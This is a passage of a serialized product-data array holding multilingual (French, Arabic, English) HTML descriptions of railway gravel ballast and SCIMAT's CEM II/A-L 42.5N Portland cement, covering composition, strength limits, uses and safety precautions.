<p><span style="font-size:16px"><span style="color:#000000"><span style="font-family:times new roman,times,serif">Tassement du <strong>Gravier Ballast</strong></span> <span style="font-family:times new roman,times,serif"> sous les traverse; il provoque une déformation verticale de la voie. Il est nécessaire de réinjecter du <strong>Gravier Ballast</strong> de faible granulométrie sous les traverses; ou bien de réaliser une opération d'entretien à l'aide d'une bourreuse. Ce genre d'opération se réalise environ tous les sept ans.</span></span></span></p>
</li>
</ul>
<p><span style="font-size:16px"><span style="color:#000000"><span style="font-family:times new roman,times,serif">On tamise le <strong>Gravier Ballast</strong> chaque vingtaine d'années pour remplacer les pierres brisées. Le <strong>Gravier Ballast</strong> présente une durée d'utilisation d'une quarantaine d'années avant de devoir être intégralement remplacé.</span></span></span></p>
<p> </p>
',
'contenu_ara' => '<p dir="rtl" style="text-align: justify;"><span style="color:#000000"><span style="font-size:16px"><strong>حصى الصابورة </strong></span><span style="font-family:times new roman,times,serif"><span style="font-size:16px"><strong>25/50 مم</strong> هو </span></span><small><span style="font-family:times new roman,times,serif"><span style="font-size:16px">طبقة</span></span></small> <span style="font-family:times new roman,times,serif"><span style="font-size:16px">الحجارة أو الحصى الذي يرتكز عليه مسار سكة الحديد.</span></span><span style="font-size:16px"><span style="font-family:times new roman,times,serif">ت</span></span><span style="font-family:times new roman,times,serif"><span style="font-size:16px">شير </span></span><span style="font-size:16px"><strong>حصى الصابورة</strong></span><span style="font-family:times new roman,times,serif"><span style="font-size:16px"><strong> </strong> إلى خليط الحصى والرمل المنتشر على الأرض أو أسفل خطوط السكك الحديدية.</span></span></span></p>
<p dir="rtl" style="text-align: justify;"><span style="color:#000000"><span style="font-size:16px"><span style="font-family:times new roman,times,serif">حلت </span><strong>حصى الصابورة</strong></span><span style="font-family:times new roman,times,serif"><span style="font-size:16px"><strong> </strong></span></span><span style="font-size:16px"><span style="font-family:times new roman,times,serif"> محل الطمي عندما دخلت حيز الاستخدام.</span></span></span></p>
<p dir="rtl" style="text-align: justify;"><span style="color:#000000"><span style="font-family:times new roman,times,serif"><span style="font-size:16px">العناصرالمستخدمة في</span></span><span style="font-size:16px"><strong> حصى الصابورة</strong></span><span style="font-family:times new roman,times,serif"><span style="font-size:16px"> بشكل عام : الحجر المسحوق ، بحجم حبة يتراوح بين 31.5 و 50 مم. يختلف نوع الصخور المستخدمة باختلاف المناطق والبلدان اعتمادًا على المناخ. توجد صخور من النوع الجوفي: الجرانيت ، الديوريت ، إلخ. </span></span></span></p>
<p dir="rtl" style="text-align: justify;"><span style="color:#000000"><small><span style="font-family:times new roman,times,serif"><span style="font-size:16px">يجب أن تتوافق عناصر</span></span></small><span style="font-size:16px"><strong>حصى الصابورة</strong></span><small><span style="font-family:times new roman,times,serif"><span style="font-size:16px"> معًا لتشكيل كتلة مضغوطة ولكنها قابلة للاختراق</span></span></small></span></p>
<p dir="rtl" style="text-align: justify;"><span style="color:#000000"><span style="font-family:times new roman,times,serif"><span style="font-size:16px">يتم التحكم في <strong>حصى الصابورة</strong> مقاس <strong>25/50 مم</strong> وفقًا لمعيار <strong>NA 5113</strong>.</span></span></span></p>
<p dir="rtl" style="text-align: justify;"><span style="color:#008000"><span style="font-size:16px"><strong><u>مجال الاستعمال</u></strong></span><strong><small><span style="font-family:times new roman,times,serif"><span style="font-size:16px"> :</span></span></small></strong></span></p>
<p dir="rtl" style="text-align: justify;"><span style="font-size:16px"><span style="font-family:times new roman,times,serif">- يستخدم </span></span><span style="color:#000000"><span style="font-size:16px"><strong>حصى الصابورة </strong></span><span style="font-family:times new roman,times,serif"><span style="font-size:16px"><strong>25/50 مم </strong>في :</span></span></span></p>
<ul dir="rtl">
<li>
<p style="text-align: justify;"><span style="color:#000000"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><strong>السكك الحديدية</strong></span></span></span></p>
</li>
</ul>
<p dir="rtl" style="text-align: justify;"><span style="color:#008000"><span style="font-size:16px"><strong><u>عراقيل:</u></strong></span></span></p>
<p dir="rtl" style="text-align: justify;"><span style="color:#000000"><span style="font-size:16px"><span style="font-family:times new roman,times,serif">ت</span></span><span style="font-family:times new roman,times,serif"><span style="font-size:16px">خضع </span></span><span style="font-size:16px"><strong>حصى الصابورة</strong></span><span style="font-family:times new roman,times,serif"><span style="font-size:16px"><strong> </strong> لنوعين من التآكل:</span></span></span></p>
<ul dir="rtl">
<li style="text-align: justify;"><span style="color:#000000"><span style="font-family:times new roman,times,serif"><span style="font-size:16px"> التلوث بالمواد الطفيلية ، مثل الأرض. تتم إزالة الأعشاب الضارة ، ولكن من الضروري استبدال </span></span><span style="font-size:16px"><strong>حصى الصابورة</strong></span><span style="font-family:times new roman,times,serif"><span style="font-size:16px"><strong> </strong> بانتظام ؛</span></span></span></li>
<li style="text-align: justify;"><span style="color:#000000"><span style="font-family:times new roman,times,serif"><span style="font-size:16px"> تسوية </span></span><span style="font-size:16px"><strong>حصى الصابورة</strong></span><span style="font-family:times new roman,times,serif"><span style="font-size:16px"><strong> </strong> تحت الأعضاء المتقاطعة ؛ يتسبب في تشوه عمودي للمسار. من الضروري إعادة حقن</span></span><span style="font-size:16px"><strong> حصى الصابورة</strong></span><span style="font-family:times new roman,times,serif"><span style="font-size:16px"><strong> </strong> ذات حجم الجسيمات الصغيرة تحت العوارض ؛ أو لإجراء عملية صيانة باستخدام آلة الدك. يتم تنفيذ هذا النوع من العمليات كل سبع سنوات تقريبًا.</span></span></span></li>
</ul>
<p dir="rtl" style="text-align: justify;"><span style="color:#000000"><span style="font-family:times new roman,times,serif"><span style="font-size:16px">نقوم بغربلة </span></span><span style="font-size:16px"><strong>حصى الصابورة</strong></span><span style="font-family:times new roman,times,serif"><span style="font-size:16px"><strong> </strong> كل عشرين عامًا لاستبدال الأحجار المكسورة. يبلغ العمر الافتراضي </span></span></span><span style="color:#FF0000"><span style="font-family:times new roman,times,serif"><span style="font-size:16px">ل</span></span></span><span style="color:#000000"><span style="font-size:16px"><strong>حصى الصابورة</strong></span><span style="font-family:times new roman,times,serif"><span style="font-size:16px"><strong> </strong>حوالي أربعين عامًا قبل أن يتم استبدالها بالكامل.</span></span></span></p>
',
'contenu_en' => '<p style="text-align:left"><span style="font-family:times new roman,times,serif"><span style="font-size:16px">The <strong>Gravel Ballast 25/50 mm</strong> is the layer of stones or gravel on which the railway track is anchored.</span></span></p>
<p style="text-align:left"><span style="font-family:times new roman,times,serif"><span style="font-size:16px">The<strong> Gravel Ballast</strong> refers to the mixture of pebbles and sand spread on the ground or under the railroad tracks. <strong>The Gravel Ballast</strong> came into use and replaced silting.</span></span></p>
<p style="text-align:left"><span style="font-family:times new roman,times,serif"><span style="font-size:16px">The elements of the <strong>Gravel Ballast</strong> generally used: crushed stone, with a grain size varying between 31.5 and 50 mm. The type of rocks used varies according to</span></span> <span style="font-family:times new roman,times,serif"><span style="font-size:16px">regions and countries depending on the climate. There are rocks of the plutonic type: granite, diorite, etc. </span></span></p>
<p style="text-align:left"><span style="font-family:times new roman,times,serif"><span style="font-size:16px">The elements of the <strong>Gravel Ballast</strong> must fit together to form a compact but permeable mass.</span></span></p>
<p style="text-align:left"><span style="font-family:times new roman,times,serif"><span style="font-size:16px">The <strong>Gravel Ballast 25/50 mm</strong> is controlled according to the <strong>NA 5113 </strong>Standard.</span></span></p>
<pre style="text-align:right">
</pre>
<p style="text-align:left"><u><span style="color:#008000"><strong><span style="font-family:times new roman,times,serif"><span style="font-size:16px">Constraints:</span></span></strong></span></u></p>
<p style="text-align:left"><span style="font-family:times new roman,times,serif"><span style="font-size:16px">Gravel Ballast undergoes two types of wear:</span></span></p>
<ul>
<li style="text-align:left"><span style="font-family:times new roman,times,serif"><span style="font-size:16px">Contamination by parasitic materials, eg earth. Weeding is carried out, but it is necessary to replace the <strong>Gravel Ballast</strong> regularly;</span></span></li>
<li style="text-align:left"><span style="font-family:times new roman,times,serif"><span style="font-size:16px">Settlement of the <strong>Gravel Ballast</strong> under the cross members; it causes a vertical deformation of the track. It is necessary to reinject the <strong>Gravel Ballast</strong> of small particle size under the sleepers; or to carry out a maintenance operation using a tamping machine. This kind of operation is carried out approximately every seven years.</span></span></li>
</ul>
<p style="text-align:left"><span style="font-family:times new roman,times,serif"><span style="font-size:16px">We sift the <strong>Gravel Ballast</strong> every twenty years to replace the broken stones. The <strong>Gravel Ballast</strong> has a useful life of about forty years before having to be completely replaced.</span></span></p>
',
'img_prd' => 'produit-1611734651.png',
'img_prd_detail' => '',
'Code_Pr' => '9959',
'prix_u' => '0',
'fiche_technique' => 'fiche_technique-1611734651.pdf',
'pos_slider' => '3'
),
'Environement' => array(),
'Pemploi' => array(),
'Securite' => array(),
'Specification' => array(),
'Stockage' => array(),
'typecomposition' => array(),
'Caracteristique' => array(),
'Controlequalite' => array()
),
(int) 5 => array(
'Produit' => array(
'id' => '78999',
'nom_fr' => 'GICA BETON',
'nom_ara' => 'جيكا بيطون',
'nom_en' => 'GICA BETON',
'sous_nom_fr' => 'CEM II A-L 42.5 N',
'sous_nom_ara' => 'CEM II A-L 42.5 N',
'sous_nom_en' => 'CEM II A-L 42.5 N',
'date_ajout' => '2021-01-27',
'image' => '',
'contenu_fr' => '<p style="text-align: justify;"> <span dir="ltr" lang="fr"><span style="color:#006400"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><u><strong>Composition</strong></u><strong> : </strong></span></span></span></span></p>
<p style="text-align: justify;"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><span style="color:#000000">Le<strong> Ciment Portland au Calcaire CEM II/A-L 42,5N -NA 442/2013</strong>- résulte du mélange du clinker en quantité au moins égale à 88-82 % et d’autres constituants tels que le Tuf & la Pouzzolane dont le total ne dépasse pas 7-13 %. </span> <span style="color:rgb(50, 50, 50)"> </span></span></span></p>
<p><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><span style="color:#006400"><u><strong>Valeurs Limites</strong></u><strong> :</strong></span></span></span><span dir="ltr" lang="fr"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><span style="color:#006400"> </span><span style="color:rgb(50, 50, 50)"> </span></span></span></span></p>
<p><span style="color:#000000"><span style="font-size:16px"><span style="font-family:times new roman,times,serif">Des valeurs limites de résistances minimales sont fixées aux échéances 2 et 28 jours. Des valeurs limites sont également fixées pour la teneur en SO3 inférieure à 3,5 % et la teneur en ions chlorure inférieure à 0,10 %.</span></span></span></p>
<p style="margin-left:21.3pt"><span dir="ltr" lang="fr"><span style="color:#006400"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><strong>Valeur limite de résistance à la compression pour CEM II/A-L 42,5N -NA 442/2013-</strong></span></span></span></span></p>
<table align="center" border="1" cellpadding="0" cellspacing="0" style="height:324px; width:432px">
<thead>
<tr>
<th scope="col" style="height:88px; width:110px">
<p style="text-align:left"><span dir="ltr" lang="fr"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><strong>Classe de Résistance</strong></span></span></span></p>
</th>
<th scope="col" style="height:88px; width:142px">
<p style="text-align:left"><span dir="ltr" lang="fr"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><strong>Limite de la Résistance selon la Norme NA 442</strong></span></span></span></p>
</th>
<th scope="col" style="height:88px; width:120px">
<p style="text-align:left"><span dir="ltr" lang="fr"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><strong>Limite Inférieure Spécifiée de notre Ciment</strong></span></span></span></p>
</th>
<th scope="col" style="height:88px; width:151px">
<p style="text-align:left"><span dir="ltr" lang="fr"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><strong>Limite Supérieure Spécifiée de notre Ciment</strong></span></span></span></p>
</th>
</tr>
</thead>
<tbody>
<tr>
<td style="height:85px; width:110px">
<p style="text-align:center"><span dir="ltr" lang="fr"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><strong>02 jours</strong></span></span></span></p>
</td>
<td style="height:85px; width:142px">
<p style="text-align:center"><span dir="ltr" lang="fr"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><strong>≥ 10,0</strong></span></span></span></p>
</td>
<td style="height:85px; width:120px">
<p style="text-align:center"><span dir="ltr" lang="fr"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><strong>22.08</strong></span></span></span></p>
</td>
<td style="height:85px; width:151px">
<p style="text-align:center"><span dir="ltr" lang="fr"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><strong>25.98</strong></span></span></span></p>
</td>
</tr>
<tr>
<td style="height:57px; width:110px">
<p style="text-align:center"><span dir="ltr" lang="fr"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><strong>28 jours</strong></span></span></span></p>
</td>
<td style="height:57px; width:142px">
<p style="text-align:center"><span dir="ltr" lang="fr"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><strong>62.5≤res≥42,5</strong></span></span></span></p>
</td>
<td style="height:57px; width:120px">
<p style="text-align:center"><span dir="ltr" lang="fr"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><strong>44,18</strong></span></span></span></p>
</td>
<td style="height:57px; width:151px">
<p style="text-align:center"><span dir="ltr" lang="fr"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><strong>48.49</strong></span></span></span></p>
</td>
</tr>
</tbody>
</table>
<p> </p>
<p><span style="color:#006400"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><u><strong>Contrôle de la Qualité</strong></u><strong> :</strong> </span></span></span></p>
<p><span dir="ltr" lang="fr"><span style="color:#000000"><span style="font-size:16px"><span style="font-family:times new roman,times,serif">La SCIMAT fabrique et commercialise des Ciments de <strong>Qualité </strong>conformément aux Normes Algériennes en vigueur. Ils sont contrôlés périodiquement par le Centre d’Études et de Services Technologiques de l’Industrie des Matériaux de Construction -CETIM-(accrédité selon le Référentiel ISO 17025). </span></span></span></span></p>
<p><span style="color:#006400"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><strong><u>Principaux domaines d’emploi</u> :</strong></span></span></span></p>
<p><span dir="ltr" lang="fr"><span style="color:#000000"><span style="font-size:16px"><span style="font-family:times new roman,times,serif">Le <strong>CEM II/A-L 42,5N</strong> -<strong>NA 442/2013-</strong> convient pour les travaux de toute nature en béton armé. Notre ciment est adapté au béton précontraint et au béton armé. De façon générale, le <strong>CEM II/A-L 42,5N</strong> <strong>-NA 442/2013-</strong> est bien adapté pour les travaux massifs exigeant une élévation de température modérée. La classe R sera préférée pour les travaux exigeants des résistances initiales plus élevées. Pour les travaux en milieux agressifs, on emploiera le Ciment pour les travaux à la mer (PM) ou résistant aux eaux sulfatées (ES).</span></span></span></span></p>
<p><span style="color:#006400"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><strong><u>Précautions particulières</u> :</strong></span></span></span></p>
<p><span dir="ltr" lang="fr"><span style="color:#000000"><span style="font-size:16px"><span style="font-family:times new roman,times,serif">Lorsque l’aspect esthétique est important (béton brut, enduits), il convient d’éviter l’emploi de certain <strong>CEM II</strong> comportant des proportions importantes de constituants susceptibles d’entraîner des variations de teinte trop marquées, les cendres volantes notamment.</span></span></span></span></p>
<p><span style="color:#006400"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><strong><u>Recommandations Spécifiques et Générales</u> :</strong></span></span></span></p>
<ul>
<li>
<p><span dir="ltr" lang="fr"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><span style="color:#000000">Utiliser des granulats propres, exempts de matières organiques;</span></span></span></span></p>
</li>
<li>
<p><span dir="ltr" lang="fr"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><span style="color:#000000">Respecter les dosages et les règles de l’art pour la mise en œuvre;</span></span></span></span></p>
</li>
<li>
<p><span dir="ltr" lang="fr"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><span style="color:#000000">Viser un rapport Eau/Ciment de préférence le plus faible possible, compatible avec une bonne rhéologie du béton frais;</span></span></span></span></p>
</li>
<li>
<p><span dir="ltr" lang="fr"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><span style="color:#000000">Utiliser des adjuvants normalisés;</span></span></span></span></p>
</li>
<li>
<p><span dir="ltr" lang="fr"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><span style="color:#000000">Éviter une dessiccation précoce par temps chaud ou venteux en réalisant une cure du béton (arrosage, bâche humide, produits de cure…);</span></span></span></span></p>
</li>
<li>
<p><span dir="ltr" lang="fr"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><span style="color:#000000">Adapter la vibration du béton à sa consistance pour obtenir une compacité optimale sans ségrégation;</span></span></span></span></p>
</li>
<li>
<p><span dir="ltr" lang="fr"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><span style="color:#000000">Éviter tout contact avec la peau et les yeux;</span></span></span></span></p>
</li>
<li>
<p><span dir="ltr" lang="fr"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><span style="color:#000000">Utiliser des équipements adaptés : gants, chaussures imperméables, lunettes…</span></span></span></span></p>
</li>
</ul>
<p><span dir="ltr" lang="fr"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><span style="color:#FF0000"><u><strong>Sécurité</strong></u> :<strong> </strong></span></span></span></span></p>
<p><span dir="ltr" lang="fr"><span style="color:#000000"><span style="font-size:16px"><span style="font-family:times new roman,times,serif">La SCIMAT vise à être l'employeur le plus sûr de la Société par l’amélioration des conditions de travail pour éviter toutes blessures corporelles et répercussions sanitaires liées à ses activités.</span></span></span></span></p>
<p><span style="color:#006400"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><u><strong>Mesures de Protection</strong></u><strong> :</strong></span></span></span></p>
<ul>
<li>
<p><span dir="ltr" lang="fr"><span style="color:#000000"><span style="font-size:16px"><span style="font-family:times new roman,times,serif">Mélanger à l'eau, le Ciment est irritant; </span></span></span></span></p>
</li>
<li>
<p><span dir="ltr" lang="fr"><span style="color:#000000"><span style="font-size:16px"><span style="font-family:times new roman,times,serif">Éviter le contact avec les yeux et la peau;</span></span></span></span></p>
</li>
<li>
<p><span dir="ltr" lang="fr"><span style="color:#000000"><span style="font-size:16px"><span style="font-family:times new roman,times,serif">Laver immédiatement et abondamment à l'eau toute zone exposée; </span></span></span></span></p>
</li>
<li>
<p><span dir="ltr" lang="fr"><span style="color:#000000"><span style="font-size:16px"><span style="font-family:times new roman,times,serif">En cas de contact avec les yeux, consulter impérativement un médecin. </span></span></span></span></p>
</li>
</ul>
<p><span dir="ltr" lang="fr"><span style="color:#000000"><span style="font-size:16px"><span style="font-family:times new roman,times,serif">Pour plus de détails,Veuillez- vous reporter à la Fiche de Données de Sécurité détaillée.</span></span></span></span></p>
<div class="source_url_spacer">
<p><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><span style="color:#006400"><u><strong>Environnement</strong></u><strong> :</strong></span></span></span></p>
<p><span dir="ltr" lang="fr"><span style="color:#000000"><span style="font-size:16px"><span style="font-family:times new roman,times,serif">La SCIMAT vise à être en permanence un exemple de la responsabilité écologique de la Société par la protection de l’environnement, y compris la prévention de la pollution et l’utilisation de ressources durables et ce par<em> </em> :</span></span></span></span></p>
<ul>
<li>
<p><span dir="ltr" lang="fr"><span style="color:#000000"><span style="font-size:16px"><span style="font-family:times new roman,times,serif">La préservation des ressources naturelles;</span></span></span></span></p>
</li>
<li>
<p><span dir="ltr" lang="fr"><span style="color:#000000"><span style="font-size:16px"><span style="font-family:times new roman,times,serif">La réduction des rejets atmosphériques;</span></span></span></span></p>
</li>
<li>
<p><span dir="ltr" lang="fr"><span style="color:#000000"><span style="font-size:16px"><span style="font-family:times new roman,times,serif">La maitrise de la gestion des déchets. </span></span></span></span></p>
</li>
</ul>
<p><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><span style="color:#40E0D0"> <u><strong>Stockage</strong></u><strong> :</strong></span></span></span></p>
<p><span dir="ltr" lang="fr"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><span style="color:#000000">Le Ciment doit être stocké au sec et protégé de l'humidité. </span> <span style="color:#008000"><strong> </strong></span></span></span></span></p>
<p><span style="color:#40E0D0"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><strong><u>Conditionnement</u> :</strong></span></span></span></p>
<p><span dir="ltr" lang="fr"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><span style="color:#000000">Le <strong>Ciment Portland CEM II A-L 42.5 N</strong> est livré en vrac et en sacs de 50 kg.</span></span></span></span></p>
<p><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><strong><u><span style="color:#000080">Certification</span></u><span style="color:#000000"> :</span></strong></span></span></p>
<p><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><span style="color:#000000"><span dir="ltr" lang="fr">Le <strong>Ciment CEM II/A (P-L) 42,5N</strong> est certifié selon la <strong>Norme Algérienne 442/2013 </strong>à la Marque de Conformité Nationale <strong>TEDJ</strong> délivrée par l’Institut Algérien de Normalisation -IANOR-</span>.</span></span></span></p>
</div>
',
'contenu_ara' => '<p dir="rtl" style="text-align:justify"><span style="font-family:times new roman,times,serif"><span style="font-size:16px"><u><span style="color:#008000"><strong>التركيبة</strong></span></u><span style="color:#008000"><strong> :</strong></span></span></span></p>
<p style="text-align:right"><span style="font-family:times new roman,times,serif"><span style="font-size:16px">الاسمنت البورتلاندي بالحجر الجيري <strong>CEM II/A-L 42,5N </strong> ناتج عن خليط الكلنكر بكمية لا تقل عن 88-82٪ ومكونات أخرى مثل Tuff & Pozzolane ، والتي لا يتجاوز مجموعها 7 -13٪.</span></span></p>
<p dir="rtl" style="text-align:justify"><span style="font-family:times new roman,times,serif"><span style="font-size:16px"><span style="color:#008000"><u><strong>القيم الحدية</strong></u><strong> :</strong></span></span></span></p>
<div id="tw-target">
<div class="g9WsWb" id="kAz1tf">
<div class="tw-ta-container hide-focus-ring tw-lfl" id="tw-target-text-container">
<p dir="rtl" style="text-align:justify"><span style="font-family:times new roman,times,serif"><span style="font-size:16px">يتم تعيين قيم الحد الأدنى من القوة لمدة 2 و 28 يومًا. يتم أيضًا تعيين القيم الحدية لمحتوى SO3 أقل من 3.5٪ ومحتوى أيون الكلوريد أقل من 0.10٪</span></span></p>
</div>
</div>
</div>
<p style="text-align:center"><span style="font-family:times new roman,times,serif"><span style="font-size:16px"><strong><span style="color:#008000">قيمة حد قوة الانضغاط لـ CEM II / A-L 42.5N </span></strong></span></span></p>
<table border="1" cellpadding="1" cellspacing="1" style="height:186px; width:431px">
<tbody>
<tr>
<td style="text-align:center"><span dir="rtl" lang="ar"><span style="font-family:times new roman,times,serif"><span style="font-size:16px"><strong>حد القوة وفقًا للمعيار NA 442</strong></span></span></span></td>
<td dir="rtl" style="text-align:center"><span dir="rtl" lang="ar"><span style="font-family:times new roman,times,serif"><span style="font-size:16px"><strong>الحد الأدنى المحدد لأسمنت SCIMAT</strong></span></span></span></td>
<td dir="rtl" style="text-align:center"><span dir="rtl" lang="ar"><span style="font-family:times new roman,times,serif"><span style="font-size:16px"><strong>الحد الأعلى المحدد لأسمنت SCIMAT</strong></span></span></span></td>
<td style="text-align:center">
<p><span dir="rtl" lang="ar"><span style="font-family:times new roman,times,serif"><span style="font-size:16px"><strong>فئة المقاومة </strong></span></span></span></p>
</td>
</tr>
<tr>
<td style="text-align:center">
<p><span dir="rtl" lang="ar"><span style="font-family:times new roman,times,serif"><span style="font-size:16px"><strong> </strong></span></span></span> <span style="font-size:16px"><span style="font-family:times new roman,times,serif"><small><strong><span style="color:rgb(50, 50, 50)">≥</span></strong></small></span></span> <span dir="rtl" lang="ar"><span style="font-family:times new roman,times,serif"><span style="font-size:16px"><strong>10,0</strong></span></span></span></p>
</td>
<td style="text-align:center"><span dir="rtl" lang="ar"><span style="font-family:times new roman,times,serif"><span style="font-size:16px"><strong>22.08</strong></span></span></span></td>
<td style="text-align:center"><span dir="rtl" lang="ar"><span style="font-family:times new roman,times,serif"><span style="font-size:16px"><strong>25.98</strong></span></span></span></td>
<td style="text-align:center"><span dir="rtl" lang="ar"><span style="font-family:times new roman,times,serif"><span style="font-size:16px"><strong>يومًان</strong></span></span></span></td>
</tr>
<tr>
<td style="text-align:center"><strong>62.5≤res≥42,5</strong></td>
<td style="text-align:center"><span dir="rtl" lang="ar"><span style="font-family:times new roman,times,serif"><span style="font-size:16px"><strong>44,18</strong></span></span></span></td>
<td style="text-align:center"><span dir="rtl" lang="ar"><span style="font-family:times new roman,times,serif"><span style="font-size:16px"><strong>48.49</strong></span></span></span></td>
<td dir="rtl" style="text-align:center"><span dir="rtl" lang="ar"><span style="font-family:times new roman,times,serif"><span style="font-size:16px"><strong>يومًا28</strong></span></span></span></td>
</tr>
</tbody>
</table>
<p style="text-align:right"> </p>
<p dir="rtl" style="text-align:justify"><span style="font-family:times new roman,times,serif"><span style="font-size:16px"><span style="color:#008000"><u><strong>رقابة الجودة</strong></u><strong> :</strong></span></span></span></p>
<p dir="rtl" style="text-align:justify"><span style="font-family:times new roman,times,serif"><span style="font-size:16px">تقوم SCIMAT بان<span style="color:#000000">ت</span>اج وتسويق الأسمنت عالي <strong>الجودة</strong> وفقًا للمعايير الجزائرية المعمول بها. يتم فحصها بشكل دوري من قبل مركز الدراسات والخدمات ا<span style="color:#000000">لتكنولوجية </span>لصناعة مواد البناء -CETIM-(المعتمد وفقًا لمعيار ISO 17025).</span></span></p>
<p dir="rtl" style="text-align:justify"><span style="font-family:times new roman,times,serif"><span style="font-size:16px"><strong><u><span style="color:#008000">مجالات الاستعمال الرئيسية:</span></u></strong></span></span></p>
<p dir="rtl" style="text-align:justify"><span style="font-family:times new roman,times,serif"><span style="font-size:16px">يعتبر <strong>CEM II / A-L 42.5N</strong> مناسبًا لجميع أنواع أعمال الخرسانة المسلحة. الأسمنت الخاص بنا مناسب للخرسانة سابقة الإجهاد والخرسانة المسلحة. بشكل عام ، يعتبر <strong>CEM II / A-L 42.5N</strong> مناسبًا تمامًا للأعمال الضخمة التي تتطلب ارتفاعًا معتدلًا في درجة الحرارة. سيتم تفضيل الفئة R للعمل الذي يتطلب نقاط قوة أولية أعلى. للعمل في بيئات عدوانية ، سيتم استخدام الأسمنت للعمل في البحر (PM) أو مقاومة للمياه الكبريتية (ES).</span></span></p>
<p dir="rtl" style="text-align:justify"><span style="font-family:times new roman,times,serif"><span style="font-size:16px"><span style="color:#008000"><u><strong>إحتياطات خاصة </strong></u><strong>:</strong></span></span></span></p>
<p dir="rtl" style="text-align:justify"><span style="font-family:times new roman,times,serif"><span style="font-size:16px"><span style="color:#000000">عندما يكون الجانب الجمالي مهمًا (الخرسانة الخام ، اللصقات) ، فمن المستحسن تجنب استخدام <strong>CEM II</strong> الذي يشتمل على نسب كبيرة من المكونات التي قد تسبب اختلافات ملحوظة في اللون ، وخاصة الرماد المتطاير.</span></span></span></p>
<p dir="rtl" style="text-align:justify"><span style="font-family:times new roman,times,serif"><span style="font-size:16px"><span style="color:#008000"><u><strong>توصيات محددة وعامة</strong></u><strong> :</strong></span></span></span></p>
<ul dir="rtl">
<li>
<p style="text-align:justify"><span style="font-family:times new roman,times,serif"><span style="font-size:16px"> استخدام ركام نظيف وخالي من المواد العضوية ؛</span></span></p>
</li>
<li>
<p style="text-align:justify"><span style="font-family:times new roman,times,serif"><span style="font-size:16px"> احترام الجرعات وقواعد فن التنفيذ ؛</span></span></p>
</li>
<li>
<p style="text-align:justify"><span style="font-family:times new roman,times,serif"><span style="font-size:16px"> تهدف إلى نسبة الماء / الأسمنت ، ويفضل أن تكون منخفضة قدر الإمكان ، ومتوافقة مع الانسيابية الجيدة للخرسانة الطازجة ؛</span></span></p>
</li>
<li>
<p style="text-align:justify"><span style="font-family:times new roman,times,serif"><span style="font-size:16px"> استخدام مواد مساعدة معيارية ؛</span></span></p>
</li>
<li>
<p style="text-align:justify"><span style="font-family:times new roman,times,serif"><span style="font-size:16px"> تجنب الجفاف المبكر في الطقس الحار أو العاصف عن طريق معالجة الخرسانة (الري ، القماش المشمع الرطب ، منتجات المعالجة ، إلخ) ؛</span></span></p>
</li>
<li>
<p style="text-align:justify"><span style="font-family:times new roman,times,serif"><span style="font-size:16px"> تكييف اهتزازات الخرسانة مع قوامها للحصول على تماسك أمثل بدون فصل ؛</span></span></p>
</li>
<li>
<p style="text-align:justify"><span style="font-family:times new roman,times,serif"><span style="font-size:16px"> تجنب ملامسة الجلد والعينين ؛</span></span></p>
</li>
<li>
<p style="text-align:justify"><span style="font-family:times new roman,times,serif"><span style="font-size:16px"> استخدم المعدات المناسبة: القفازات ، والأحذية المقاومة للماء ، والنظارات ، وما إلى ذلك.</span></span></p>
</li>
</ul>
<p dir="rtl" style="text-align:justify"><span style="color:#FF0000"><u><strong><span style="font-family:times new roman,times,serif"><span style="font-size:16px">الحماية :</span></span></strong></u></span></p>
<p dir="rtl" style="text-align:justify"><span style="font-family:times new roman,times,serif"><span style="font-size:16px">تهدف SCIMAT إلى أن تكون الشركة الأكثر أمانًا في المجتمع من خلال تحسين ظروف العمل لتجنب أي إصابات جسدية وتداعيات صحية مرتبطة بأنشطتها</span></span></p>
<p dir="rtl" style="text-align:justify"><span style="font-family:times new roman,times,serif"><span style="font-size:16px"><span style="color:#008000"><u><strong>تدابير وقائية:</strong></u></span></span></span></p>
<ul dir="rtl">
<li style="text-align:left">
<p style="text-align:justify"><span dir="rtl" lang="ar"><span style="font-family:times new roman,times,serif"><span style="font-size:16px"> يخلط مع الماء ، والأسمنت مزعج.</span></span></span></p>
</li>
<li style="text-align:left">
<p style="text-align:justify"><span dir="rtl" lang="ar"><span style="font-family:times new roman,times,serif"><span style="font-size:16px"> تجنب ملامسة العينين والجلد؛</span></span></span></p>
</li>
<li style="text-align:left">
